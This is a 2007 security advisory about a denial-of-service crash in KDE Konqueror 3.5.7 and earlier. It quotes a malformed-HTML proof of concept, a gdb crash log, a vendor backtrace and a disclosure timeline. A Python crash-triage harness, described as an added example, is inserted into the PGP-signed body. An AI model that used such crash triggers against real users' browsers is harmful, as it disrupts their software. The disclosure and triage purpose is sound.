
kde357-dos.txt
Posted Aug 8, 2007
Authored by Thomas Waldegger | Site buha.info

KDE's Konqueror versions 3.5.7 and below suffer from a denial of service vulnerability.

tags | advisory, denial of service
MD5 | 40a2b81559278a98990ee22636d8c909

-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160

---------------------------------------------------
| BuHa Security-Advisory #16 | Aug 01st, 2007 |
---------------------------------------------------
| Vendor | KDE's Konqueror |
| URL | http://www.konqueror.org/ |
| Version | <= 3.5.7 |
| Risk | Low (Denial Of Service) |
---------------------------------------------------

o Description:
=============

Konqueror is the file manager for the K Desktop Environment and an
Open Source web browser with HTML 4.01 compliance.

Visit http://www.konqueror.org/ for detailed information.

o Denial of Service:
===================

The following (deliberately malformed) HTML code forces Konqueror to crash:
> <textarea></button></textarea></br><bdo dir="">
> <pre><frameset>
> <a>

Online-demo:
http://morph3us.org/security/pen-testing/konqueror/1178292626-khtml.html

> (gdb) set args konqueror.html
> (gdb) r
> Starting program: /usr/bin/konqueror konqueror.html
> (no debugging symbols found)
> [...]
> [Thread debugging using libthread_db enabled]
> [New Thread -1234381104 (LWP 5982)]
> (no debugging symbols found)
> [...]
> Qt: gdb: -nograb added to command-line options.
> Use the -dograb option to enforce grabbing.
> X Error: BadDevice, invalid or uninitialized input device 169
> Major opcode: 145
> Minor opcode: 3
> Resource id: 0x0
> Failed to open device
> X Error: BadDevice, invalid or uninitialized input device 169
> Major opcode: 145
> Minor opcode: 3
> Resource id: 0x0
> Failed to open device
> (no debugging symbols found)
> [...]
>
> Program received signal SIGSEGV, Segmentation fault.
> [Switching to Thread -1234381104 (LWP 5982)]
> 0xb5ef84e7 in ?? () from /usr/lib/libkhtml.so.
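The reproduction above is interactive: write the HTML to a file, start Konqueror on it under gdb and wait for the SIGSEGV. The harness below is an added example, not code from the advisory or from KDE. It writes the advisory's trigger to a temporary file, runs a target command on it with a timeout and classifies the outcome as a clean exit, a crash (process killed by a signal; -11 is SIGSEGV as in the session above, -6 is SIGABRT, which a failing assert() would produce) or a timeout. The target command is a parameter: passing ["konqueror"] assumes Konqueror is on PATH. The gdb command it prints is the non-interactive equivalent of the `set args` / `r` session.

```python
"""Crash-triage harness for a browser denial-of-service proof of concept.

Added example; neither part of the BuHa advisory nor KDE code. It writes the
advisory's HTML trigger to a temporary file, runs a target command on that
file under a timeout, and classifies the outcome as a clean exit, a crash
(process killed by a signal such as SIGSEGV) or a timeout. The target
command is a parameter: ["konqueror"] assumes Konqueror is on PATH.
"""
import os
import signal
import subprocess
import sys
import tempfile
from dataclasses import dataclass
from typing import List, Optional

# The HTML trigger exactly as quoted in the advisory (Konqueror <= 3.5.7).
TRIGGER_HTML = (
    '<textarea></button></textarea></br><bdo dir="">\n'
    '<pre><frameset>\n'
    '<a>\n'
)


@dataclass
class Outcome:
    kind: str         # "clean", "crash" or "timeout"
    signal_name: str  # e.g. "SIGSEGV" when kind == "crash", else ""
    returncode: int   # raw return code; negative means killed by a signal


def write_trigger(directory: str) -> str:
    """Write the proof of concept to disk and return its path."""
    path = os.path.join(directory, "konqueror.html")
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(TRIGGER_HTML)
    return path


def classify(returncode: Optional[int]) -> Outcome:
    """Map a subprocess return code to a triage verdict.

    subprocess reports death by signal as a negative return code, so -11 is
    SIGSEGV (the advisory's crash) and -6 is SIGABRT (a failing assert()).
    """
    if returncode is None:
        return Outcome("timeout", "", 0)
    if returncode < 0:
        try:
            name = signal.Signals(-returncode).name
        except ValueError:
            name = "SIG%d" % -returncode
        return Outcome("crash", name, returncode)
    return Outcome("clean", "", returncode)


def run_target(command: List[str], html_path: str, timeout: float = 20.0) -> Outcome:
    """Run `command + [html_path]` with a timeout and classify the result.

    For a GUI browser a timeout normally means "rendered the page and kept
    running", i.e. no crash within the window; for a headless parser it
    means a hang. Either way the child is killed before returning.
    """
    try:
        proc = subprocess.run(command + [html_path], timeout=timeout,
                              stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    except subprocess.TimeoutExpired:
        return classify(None)
    return classify(proc.returncode)


def gdb_command(command: List[str], html_path: str) -> List[str]:
    """Non-interactive equivalent of the advisory's `set args` / `r` session:
    run the target under gdb and print a backtrace once it stops."""
    return ["gdb", "-q", "-batch", "-ex", "run", "-ex", "bt", "--args"] + command + [html_path]


def triage(command: List[str], timeout: float = 20.0) -> Outcome:
    """Write the trigger, run the target on it, and return the verdict."""
    with tempfile.TemporaryDirectory() as tmp:
        return run_target(command, write_trigger(tmp), timeout)


if __name__ == "__main__":
    target = sys.argv[1:] or ["konqueror"]  # assumption: konqueror is on PATH
    result = triage(target)
    print(result)
    if result.kind == "crash":
        print("reproduce under gdb with:", " ".join(gdb_command(target, "konqueror.html")))
```

Run it as `python3 triage.py konqueror` (or with any other browser or HTML parser command). Because the classifier only looks at how the child process ended, it can be checked without KDE installed by pointing it at a shell that kills itself with signal 11, which is how the self-test exercises the crash path.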

I sent a mail to KDE's security mailing list [1] and received an answer
from Dirk Mueller several days later. He wrote that the HTML code triggers
an assert and that, when the assert is commented out, the backtrace ends in:

> #6 0xb7bb37a4 in khtml::RenderFlow::lastLineBox (this=0x0)
> at /home/dirk/src/kde/3.5/kdelibs/khtml/rendering/render_flow.h:65
> #7 0xb7c850df in khtml::RenderBlock::createLineBoxes (this=0x821ab08,
> obj=0x0)
> at /home/dirk/src/kde/3.5/kdelibs/khtml/rendering/bidi.cpp:624

This issue does not seem to be exploitable: the backtrace shows lastLineBox()
being called on a null object (this=0x0, from obj=0x0 in createLineBoxes),
i.e. a plain NULL pointer dereference, which crashes the process but gives an
attacker no control over what is read or written.

o Disclosure Timeline:
=====================

03 May 07 - DoS vulnerability discovered.
07 May 07 - Vendor contacted.
10 May 07 - Vendor confirmed vulnerability.
01 Aug 07 - Public release.

o Solution:
==========

There is no solution yet. I assume the KDE developers will address this
bug in an upcoming KDE release.

o Credits:
=========

Thomas Waldegger <bugtraq@morph3us.org>
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address 'bugtraq@morph3us.org' is more a
spam address than a regular mail address, therefore it's possible that I
ignore some mails. Please use the contact details at http://morph3us.org/
to contact me.

Greets fly out to cyrus-tc, destructor, echox, Killsystem, nait, Neon,
Rodnox, trappy and all members of BuHa.

Advisory online:
http://morph3us.org/advisories/20070801-konqueror-3.57.txt

[1] http://www.kde.org/info/security/

- --
Don't you feel the power of CSS Layouts?
BuHa-Security Community: https://buha.info/board/

-----BEGIN PGP SIGNATURE-----
Version: n/a
Comment: http://morph3us.org/

iD8DBQFGsNwHkCo6/ctnOpYRA02bAJ0YjwxUB3PnYf2IKTyT0RkauZmd3QCgir16
WHuq7rPUBPx1/5nx+jJUPDg=
=R4ZU
-----END PGP SIGNATURE-----
